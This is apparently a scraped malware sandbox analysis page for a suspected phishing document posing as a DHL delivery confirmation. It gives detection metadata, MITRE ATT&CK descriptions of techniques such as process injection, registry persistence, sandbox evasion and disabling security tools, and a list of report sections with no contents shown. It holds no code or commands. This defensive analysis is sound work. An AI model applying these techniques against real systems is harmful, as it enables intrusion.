Has administrator privileges:	true
Programmed in:	Visual Basic
Antivirus matches:	Detection: 27%, ReversingLabs
Reputation:	low

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may send spearphishing emails with a malicious link in an attempt to elicit sensitive information and/or gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments.
Tactics:	Initial Access
Data Sources:	DNS records, Detonation chamber, Email gateway, Mail server, Packet capture, SSL/TLS inspection, Web proxy
Platforms:	Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report DHL_ DELIVERY_ PICKUP _CONFIRMATION_CBJ200618092901.doc

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Memory Dumps

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Exploits:

Compliance:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

Spam, unwanted Advertisements and Ransom Demands:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static RTF Info

Objects

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Code Manipulations

Statistics

Behavior

System Behavior

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre